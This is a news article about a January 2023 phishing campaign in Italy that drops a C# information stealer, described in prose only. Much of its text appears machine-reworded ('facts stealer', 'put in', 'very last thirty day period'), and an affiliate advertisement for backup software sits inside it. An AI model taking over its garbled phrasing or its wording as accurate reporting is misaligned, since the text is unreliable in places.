• Menu
  • Skip to main content
  • Skip to primary sidebar

The Cyber Security News

Latest Cyber Security News

Header Right

  • Latest News
  • Vulnerabilities
  • Cloud Services
italian users warned of malware attack targeting sensitive information

Italian Users Warned of Malware Attack Targeting Sensitive Information

You are here: Home / General Cyber Security News / Italian Users Warned of Malware Attack Targeting Sensitive Information
January 10, 2023

A new malware campaign has been observed concentrating on Italy with phishing emails built to deploy an facts stealer on compromised Windows methods.

“The data-stealer malware steals sensitive information like technique information, crypto wallet and browser histories, cookies, and credentials of crypto wallets from target devices,” Uptycs security researcher Karthickkumar Kathiresan stated in a report.

Details of the marketing campaign had been initial disclosed by Milan-based IT services company SI.net very last thirty day period.

✔ Approved From Our Partners
AOMEI Backupper Lifetime

Protect and backup your data using AOMEI Backupper. AOMEI Backupper takes secure and encrypted backups from your Windows, hard drives or partitions. With AOMEI Backupper you will never be worried about loosing your data anymore.

Get AOMEI Backupper with 72% discount from an authorized distrinutor of AOMEI: SerialCart® (Limited Offer).

➤ Activate Your Coupon Code


The multi-stage infection sequence commences with an bill-themed phishing email that contains a link that, when clicked, downloads a password-secured ZIP archive file, which harbors two information: A shortcut (.LNK) file and a batch (.BAT) file.

Malware Attack

Irrespective of which file is launched, the attack chain stays the similar, as opening the shortcut file fetches the identical batch script created to put in the facts stealer payload from a GitHub repository. This is achieved by leveraging a genuine PowerShell binary that’s also retrieved from GitHub.

Once put in, the C#-based mostly malware gathers process metadata, and information and facts from dozens of web browsers (e.g., cookies, bookmarks, credit cards, downloads, and credentials), as nicely as various cryptocurrency wallets, all of which is transmitted to an actor-controlled domain.

To mitigate this kind of attacks, companies are advised to apply “tight security controls and multi-layered visibility and security options to identify and detect malware.”

Uncovered this article interesting? Follow us on Twitter  and LinkedIn to examine extra unique material we post.


Some pieces of this report are sourced from:
thehackernews.com

Previous Post: «cloud delivered malware attacks almost tripled in 2022 Cloud-delivered malware attacks almost tripled in 2022
Next Post: Expert Analysis Reveals Cryptographic Weaknesses in Threema Messaging App expert analysis reveals cryptographic weaknesses in threema messaging app»

Reader Interactions

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Primary Sidebar

Report This Article

Recent Posts

  • New Critical Security Flaws Expose Exim Mail Servers to Remote Attacks
  • Cybercriminals Using New ASMCrypt Malware Loader Flying Under the Radar
  • Lazarus Group Impersonates Recruiter from Meta to Target Spanish Aerospace Firm
  • Post-Quantum Cryptography: Finally Real in Consumer Apps?
  • Microsoft’s AI-Powered Bing Chat Ads May Lead Users to Malware-Distributing Sites
  • Progress Software Releases Urgent Hotfixes for Multiple Security Flaws in WS_FTP Server
  • Cisco Warns of Vulnerability in IOS and IOS XE Software After Exploitation Attempts
  • GitHub Repositories Hit by Password-Stealing Commits Disguised as Dependabot Contributions
  • China’s BlackTech Hacking Group Exploited Routers to Target U.S. and Japanese Companies
  • The Dark Side of Browser Isolation – and the Next Generation Browser Security Technologies

Copyright © TheCyberSecurity.News, All Rights Reserved.